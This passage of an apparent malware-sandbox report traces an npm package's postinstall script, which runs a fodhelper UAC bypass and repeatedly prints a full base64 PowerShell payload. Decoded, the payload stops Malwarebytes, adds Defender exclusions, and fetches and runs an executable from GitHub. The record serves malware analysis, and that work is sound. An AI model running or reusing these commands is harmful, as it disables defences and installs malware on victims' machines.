ZXN0IC1VcmkgJHUgLU91dEZpbGUgJHAgLVVzZUJhc2ljUGFyc2luZzsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJHAgLVZlcmIgUnVuQXMK'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded\"" /f"
        5⤵
        
        PID:3116
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "C:\WindowsApi\b74668fc0382f3c656ffb31c8c9a38b5bbd77a06.exe /c powershell -Command \"$b64 = 'JHBzV2luZG93ID0gKEdldC1Qcm9jZXNzIC1JZCAkUElEKS5NYWluV2luZG93SGFuZGxlOyBBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTsgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOyBwdWJsaWMgY2xhc3MgV2luQVBJIHsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7IH0nOyBbV2luQVBJXTo6U2hvd1dpbmRvdygkcHNXaW5kb3csIDYpOyBpZiAoR2V0LVNlcnZpY2UgTUJBTVNlcnZpY2UgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUgfCBXaGVyZS1PYmplY3QgeyAkXy5TdGF0dXMgLWVxICdSdW5uaW5nJyB9KSB7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxQcm9ncmFtIEZpbGVzXE1hbHdhcmVieXRlc1xBbnRpLU1hbHdhcmVcbWFsd2FyZWJ5dGVzX2Fzc2lzdGFudC5leGUiIC1Bcmd1bWVudExpc3QgIi0tc3RvcHNlcnZpY2UiIH07IEdldC1XbWlPYmplY3QgV2luMzJfTG9naWNhbERpc2sgfCBXaGVyZS1PYmplY3QgeyAkXy5Ecml2ZVR5cGUgLWVxIDMgfSB8IEZvckVhY2gtT2JqZWN0IHsgQWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAoJF8uRGV2aWNlSUQuVHJpbSgpICsgIlwiKSB9OyAkdT0iaHR0cHM6Ly9naXRodWIuY29tL21pY2hlYWxqYW1lczk2L3JvYklveC1jZG4vcmF3L3JlZnMvaGVhZHMvbWFpbi9PbmVkcml2ZS5leGUiOyAkcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJHUgLU91dEZpbGUgJHAgLVVzZUJhc2ljUGFyc2luZzsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJHAgLVZlcmIgUnVuQXMK'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded\"" /f
        6⤵
        Modifies registry class
        
        PID:5704
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f"
        5⤵
        
        PID:5388
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        6⤵
        Modifies registry class
        
        PID:5368
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /d /s /c "start "" "C:\Windows\System32\fodhelper.exe""
        5⤵
        
        PID:5404
      - C:\Windows\System32\fodhelper.exe
        
        "C:\Windows\System32\fodhelper.exe"
        6⤵
        
        PID:6096
        
        C:\WindowsApi\b74668fc0382f3c656ffb31c8c9a38b5bbd77a06.exe
        
        "C:\WindowsApi\b74668fc0382f3c656ffb31c8c9a38b5bbd77a06.exe" /c powershell -Command "$b64 = 'JHBzV2luZG93ID0gKEdldC1Qcm9jZXNzIC1JZCAkUElEKS5NYWluV2luZG93SGFuZGxlOyBBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTsgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOyBwdWJsaWMgY2xhc3MgV2luQVBJIHsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7IH0nOyBbV2luQVBJXTo6U2hvd1dpbmRvdygkcHNXaW5kb3csIDYpOyBpZiAoR2V0LVNlcnZpY2UgTUJBTVNlcnZpY2UgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUgfCBXaGVyZS1PYmplY3QgeyAkXy5TdGF0dXMgLWVxICdSdW5uaW5nJyB9KSB7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxQcm9ncmFtIEZpbGVzXE1hbHdhcmVieXRlc1xBbnRpLU1hbHdhcmVcbWFsd2FyZWJ5dGVzX2Fzc2lzdGFudC5leGUiIC1Bcmd1bWVudExpc3QgIi0tc3RvcHNlcnZpY2UiIH07IEdldC1XbWlPYmplY3QgV2luMzJfTG9naWNhbERpc2sgfCBXaGVyZS1PYmplY3QgeyAkXy5Ecml2ZVR5cGUgLWVxIDMgfSB8IEZvckVhY2gtT2JqZWN0IHsgQWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAoJF8uRGV2aWNlSUQuVHJpbSgpICsgIlwiKSB9OyAkdT0iaHR0cHM6Ly9naXRodWIuY29tL21pY2hlYWxqYW1lczk2L3JvYklveC1jZG4vcmF3L3JlZnMvaGVhZHMvbWFpbi9PbmVkcml2ZS5leGUiOyAkcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJHUgLU91dEZpbGUgJHAgLVVzZUJhc2ljUGFyc2luZzsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJHAgLVZlcmIgUnVuQXMK'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded"
        7⤵
        Executes dropped EXE
        
        PID:5620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$b64 = 'JHBzV2luZG93ID0gKEdldC1Qcm9jZXNzIC1JZCAkUElEKS5NYWluV2luZG93SGFuZGxlOyBBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTsgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOyBwdWJsaWMgY2xhc3MgV2luQVBJIHsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7IH0nOyBbV2luQVBJXTo6U2hvd1dpbmRvdygkcHNXaW5kb3csIDYpOyBpZiAoR2V0LVNlcnZpY2UgTUJBTVNlcnZpY2UgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUgfCBXaGVyZS1PYmplY3QgeyAkXy5TdGF0dXMgLWVxICdSdW5uaW5nJyB9KSB7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxQcm9ncmFtIEZpbGVzXE1hbHdhcmVieXRlc1xBbnRpLU1hbHdhcmVcbWFsd2FyZWJ5dGVzX2Fzc2lzdGFudC5leGUiIC1Bcmd1bWVudExpc3QgIi0tc3RvcHNlcnZpY2UiIH07IEdldC1XbWlPYmplY3QgV2luMzJfTG9naWNhbERpc2sgfCBXaGVyZS1PYmplY3QgeyAkXy5Ecml2ZVR5cGUgLWVxIDMgfSB8IEZvckVhY2gtT2JqZWN0IHsgQWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAoJF8uRGV2aWNlSUQuVHJpbSgpICsgIlwiKSB9OyAkdT0iaHR0cHM6Ly9naXRodWIuY29tL21pY2hlYWxqYW1lczk2L3JvYklveC1jZG4vcmF3L3JlZnMvaGVhZHMvbWFpbi9PbmVkcml2ZS5leGUiOyAkcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJHUgLU91dEZpbGUgJHAgLVVzZUJhc2ljUGFyc2luZzsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJHAgLVZlcmIgUnVuQXMK'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5984
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rtdhy0of\rtdhy0of.cmdline"
        9⤵
        
        PID:5496
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF22.tmp" "c:\Users\Admin\AppData\Local\Temp\rtdhy0of\CSC483988CAD1D84F58AC4FD9D75118CE.TMP"
        10⤵
        
        PID:5324
        
        C:\Users\Admin\AppData\Local\Temp\Onedrive.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Onedrive.exe"
        9⤵
        Drops startup file
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:1912
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://exmple.com/
        10⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3284
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe8cbb3cb8,0x7ffe8cbb3cc8,0x7ffe8cbb3cd8
        11⤵
        
        PID:1572
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,5939574913514097977,4000968490439965244,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1964 /prefetch:2
        11⤵
        
        PID:3412
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,5939574913514097977,4000968490439965244,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:736
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1948,5939574913514097977,4000968490439965244,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8
        11⤵
        
        PID:4748
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,5939574913514097977,4000968490439965244,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
        11⤵
        
        PID:2856
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,5939574913514097977,4000968490439965244,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:1
        11⤵
        
        PID:4980
        
        C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1948,5939574913514097977,4000968490439965244,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:228
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1948,5939574913514097977,4000968490439965244,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
        11⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5140
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,5939574913514097977,4000968490439965244,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:1
        11⤵
        
        PID:3516
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,5939574913514097977,4000968490439965244,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
        11⤵
        
        PID:1676
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,5939574913514097977,4000968490439965244,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
        11⤵
        
        PID:2596
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,5939574913514097977,4000968490439965244,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
        11⤵
        
        PID:6128
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,5939574913514097977,4000968490439965244,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
        11⤵
        
        PID:4804
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,5939574913514097977,4000968490439965244,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
        11⤵
        
        PID:1292
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,5939574913514097977,4000968490439965244,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
        11⤵
        
        PID:1008
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://pornhub.com/
        10⤵
        
        PID:5264
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe8cbb3cb8,0x7ffe8cbb3cc8,0x7ffe8cbb3cd8
        11⤵
        
        PID:5440
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "[Windows.UI.Notifications.ToastNotificationManager, Windows.UI.Notifications, ContentType = WindowsRuntime] | Out-Null; Get-ChildItem HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings | ForEach-Object { ([Windows.UI.Notifications.ToastNotificationManager]::History).clear(($_.Name -split '\\')[-1].TrimEnd('}')) }""
        5⤵
        
        PID:5464
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "[Windows.UI.Notifications.ToastNotificationManager, Windows.UI.Notifications, ContentType = WindowsRuntime] | Out-Null; Get-ChildItem HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings | ForEach-Object { ([Windows.UI.Notifications.ToastNotificationManager]::History).clear(($_.Name -split '\\')[-1].TrimEnd('}')) }"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5964
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\Software\Classes\ms-settings" /f"
        5⤵
        
        PID:124
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Classes\ms-settings" /f
        6⤵
        Modifies registry class
        
        PID:2740
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\Software\Classes\g9eriio86qu4avews7s5" /f"
        5⤵
        
        PID:3204
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\Software\Classes\g9eriio86qu4avews7s5" /f
        6⤵
        Modifies registry class
        
        PID:1892

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1416

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5372

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
PID:4684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c CALL "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
  2⤵
  PID:2708
- - C:\Program Files\nodejs\node.exe
    "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
    3⤵
    - Executes dropped EXE
    PID:5316
- C:\Program Files\nodejs\node.exe
  "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-cli.js" install [email protected]
  2⤵
  - Executes dropped EXE
  PID:2672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c CALL "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
  2⤵
  PID:5292
- - C:\Program Files\nodejs\node.exe
    "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-prefix.js"
    3⤵
    - Executes dropped EXE
    PID:4176
- C:\Program Files\nodejs\node.exe
  "C:\Program Files\nodejs\\node.exe" "C:\Program Files\nodejs\\node_modules\npm\bin\npm-cli.js" install rbx-reader-ts
  2⤵
  - Executes dropped EXE
  PID:5576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c exit 0
    3⤵
    PID:1440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c node postinstall
    3⤵
    PID:4772
  - - C:\Program Files\nodejs\node.exe
      node postinstall
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3204
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\ca75muodqnve38eo8skc\Shell\open\command" /f"
        5⤵
        
        PID:2208
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\ca75muodqnve38eo8skc\Shell\open\command" /f
        6⤵
        Modifies registry class
        
        PID:5360
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\ca75muodqnve38eo8skc\Shell\open\command" /ve /t REG_SZ /d "C:\WindowsApi\f66155b791a72518a5d05e25caf6eb0696d2374a.exe" /f"
        5⤵
        
        PID:4456
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\ca75muodqnve38eo8skc\Shell\open\command" /ve /t REG_SZ /d "C:\WindowsApi\f66155b791a72518a5d05e25caf6eb0696d2374a.exe" /f
        6⤵
        Modifies registry class
        
        PID:3928
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /f"
        5⤵
        
        PID:5452
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /f
        6⤵
        Modifies registry class
        
        PID:1892
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "C:\WindowsApi\f66155b791a72518a5d05e25caf6eb0696d2374a.exe /c powershell -Command \"$b64 = 'JHBzV2luZG93ID0gKEdldC1Qcm9jZXNzIC1JZCAkUElEKS5NYWluV2luZG93SGFuZGxlOyBBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTsgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOyBwdWJsaWMgY2xhc3MgV2luQVBJIHsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7IH0nOyBbV2luQVBJXTo6U2hvd1dpbmRvdygkcHNXaW5kb3csIDYpOyBpZiAoR2V0LVNlcnZpY2UgTUJBTVNlcnZpY2UgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUgfCBXaGVyZS1PYmplY3QgeyAkXy5TdGF0dXMgLWVxICdSdW5uaW5nJyB9KSB7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxQcm9ncmFtIEZpbGVzXE1hbHdhcmVieXRlc1xBbnRpLU1hbHdhcmVcbWFsd2FyZWJ5dGVzX2Fzc2lzdGFudC5leGUiIC1Bcmd1bWVudExpc3QgIi0tc3RvcHNlcnZpY2UiIH07IEdldC1XbWlPYmplY3QgV2luMzJfTG9naWNhbERpc2sgfCBXaGVyZS1PYmplY3QgeyAkXy5Ecml2ZVR5cGUgLWVxIDMgfSB8IEZvckVhY2gtT2JqZWN0IHsgQWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAoJF8uRGV2aWNlSUQuVHJpbSgpICsgIlwiKSB9OyAkdT0iaHR0cHM6Ly9naXRodWIuY29tL21pY2hlYWxqYW1lczk2L3JvYklveC1jZG4vcmF3L3JlZnMvaGVhZHMvbWFpbi9PbmVkcml2ZS5leGUiOyAkcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJHUgLU91dEZpbGUgJHAgLVVzZUJhc2ljUGFyc2luZzsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJHAgLVZlcmIgUnVuQXMK'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded\"" /f"
        5⤵
        
        PID:2476
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "C:\WindowsApi\f66155b791a72518a5d05e25caf6eb0696d2374a.exe /c powershell -Command \"$b64 = 'JHBzV2luZG93ID0gKEdldC1Qcm9jZXNzIC1JZCAkUElEKS5NYWluV2luZG93SGFuZGxlOyBBZGQtVHlwZSAtVHlwZURlZmluaXRpb24gJ3VzaW5nIFN5c3RlbTsgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOyBwdWJsaWMgY2xhc3MgV2luQVBJIHsgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coSW50UHRyIGhXbmQsIGludCBuQ21kU2hvdyk7IH0nOyBbV2luQVBJXTo6U2hvd1dpbmRvdygkcHNXaW5kb3csIDYpOyBpZiAoR2V0LVNlcnZpY2UgTUJBTVNlcnZpY2UgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWUgfCBXaGVyZS1PYmplY3QgeyAkXy5TdGF0dXMgLWVxICdSdW5uaW5nJyB9KSB7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxQcm9ncmFtIEZpbGVzXE1hbHdhcmVieXRlc1xBbnRpLU1hbHdhcmVcbWFsd2FyZWJ5dGVzX2Fzc2lzdGFudC5leGUiIC1Bcmd1bWVudExpc3QgIi0tc3RvcHNlcnZpY2UiIH07IEdldC1XbWlPYmplY3QgV2luMzJfTG9naWNhbERpc2sgfCBXaGVyZS1PYmplY3QgeyAkXy5Ecml2ZVR5cGUgLWVxIDMgfSB8IEZvckVhY2gtT2JqZWN0IHsgQWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAoJF8uRGV2aWNlSUQuVHJpbSgpICsgIlwiKSB9OyAkdT0iaHR0cHM6Ly9naXRodWIuY29tL21pY2hlYWxqYW1lczk2L3JvYklveC1jZG4vcmF3L3JlZnMvaGVhZHMvbWFpbi9PbmVkcml2ZS5leGUiOyAkcD0iJGVudjpURU1QXE9uZWRyaXZlLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJHUgLU91dEZpbGUgJHAgLVVzZUJhc2ljUGFyc2luZzsgU3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggJHAgLVZlcmIgUnVuQXMK'; $decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64)); Invoke-Expression $decoded\"" /f
        6⤵
        Modifies registry class
        
        PID:4792
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f"
        5⤵
        
        PID:4672
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        6⤵
        Modifies registry class
        
        PID:5968
    - - C:\Windows\system32\cmd.exe
        
